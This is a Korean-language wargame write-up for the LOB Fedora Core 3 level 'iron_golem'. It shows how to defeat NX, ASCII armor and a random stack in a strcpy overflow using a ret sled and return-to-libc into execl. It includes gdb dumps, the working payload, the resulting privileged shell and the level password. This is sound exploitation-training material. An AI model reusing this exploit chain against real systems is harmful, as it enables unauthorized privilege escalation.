Wargame/LOB_FC

[LOB_FC3] gate ->iron_golem

bbolmin 2014. 7. 5. 14:04



#Env 


- NX

- ascii armor

- random stack


#Technic


- &ret sled로 RTL 인자 구성





iron_golem.c 소스





1] 기본 정보 확인


- stack에 'X'비트 확인


[gate@Fedora_1stFloor ~]$ readelf -l iron_golem | grep STACK

  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4



- Ascii Armor 확인


[gate@Fedora_1stFloor ~]$ ldd iron_golem

        libc.so.6 => /lib/tls/libc.so.6 (0x0071c000)

        /lib/ld-linux.so.2 (0x00703000)



=> 취약점은 strcpy에서 일어나며 stack에 실행 권한이 없으며  ascii armor가 있다.





2] payload 작성




(gdb) r `perl -e 'print "a"x264'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/iron_golem `perl -e 'print "a"x264'`

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048426 in main ()

(gdb) x/10x $ebp-0x20

0xfefa29d8:     0x61616161      0x61616161      0x61616161      0x61616161

0xfefa29e8:     0x61616161      0x61616161      0x61616161      0x61616161

0xfefa29f8:     0xfefa2a00      0x00730e33

(gdb) x/4x $ebp

0xfefa29f8:     0xfefa2a00      0x00730e33      0x00000002      0xfefa2a84

(gdb)



=> |   264 buf   |   ebp   |   ret   |

랜덤 스택이지만 고정적인 스택의 데이터를 이용해서 execl의 인자값으로 사용한다. (&ret sled이용)

(gdb) x/20x $ebp
0xfefe1128:     0xfefe1188      0x00730e33      0x00000002      0xfefe11b4
0xfefe1138:     0xfefe11c0      0x0070eab6      0x0083eff4      0x00000000
0xfefe1148:     0xfefe1140      0xfefe1188      0xfefe1130      0x00730df5
0xfefe1158:     0x00000000      0x00000000      0x00000000      0x00718fb4
0xfefe1168:     0x00000002      0x08048328      0x00000000      0x0070e9f0

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gate/iron_golem abcd
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x08048426 in main ()
(gdb) x/20x $ebp
0xfee0d3e8:     0xfee0d448      0x00730e33      0x00000002      0xfee0d474
0xfee0d3f8:     0xfee0d480      0x0070eab6      0x0083eff4      0x00000000
0xfee0d408:     0xfee0d400      0xfee0d448      0xfee0d3f0      0x00730df5
0xfee0d418:     0x00000000      0x00000000      0x00000000      0x00718fb4
0xfee0d428:     0x00000002      0x08048328      0x00000000      0x0070e9f0



(gdb) p execl
$1 = {<text variable, no debug info>} 0x7a5720 <execl>

(gdb) x/i main+113
0x8048441 <main+113>:   ret


=> 
&ret = 0x8048441 
&execl = 0x7a5720
execl(0x0070eab6, 0x0083eff4, 0x00000000)

payload : |   264 buf   |   ebp   |   &ret x 2 | &execl | dummy(4) | 0x0070eab6, 0x0083eff4, 0x00000000 ...... 

0x0070eab6가 execl로 실행할 파일 이름이 되므로 쉘을 띄우는 프로그램에 심볼릭 링크를 설정하면 된다.


ln -s a.out  "`perl -e' print "\x8b\x55\xf0\x83\xec\x14\x89\xc1\x31\xc0\x85\xd2\x74\x0b\x85\xc9\x74\x4c\x8b\x42\x04\x8b\x31\x01\xf0\x8b\xbb\xf8\xfc\xff\xff\x85\xff\x75\x05\x8b\x4d\xe4\x89\x01\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x8b\x4d\xe8\x8b\x40\x04\x0f\xb7\x04\x48\x8b\x8e\x88\x01"'`"




공격코드 : "`perl -e 'print "a"x264, "bbbb", "\x41\x84\x04\x08"x2, "\x20\x57\x7a\x00"'`"


[gate@Fedora_1stFloor ~]$ ./iron_golem  "`perl -e 'print "a"x264, "bbbb", "\x41\x84\x04\x08"x2, "\x20\x57\x7a\x00"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbAA Wz

sh-3.00$ id

uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

blood on the fedora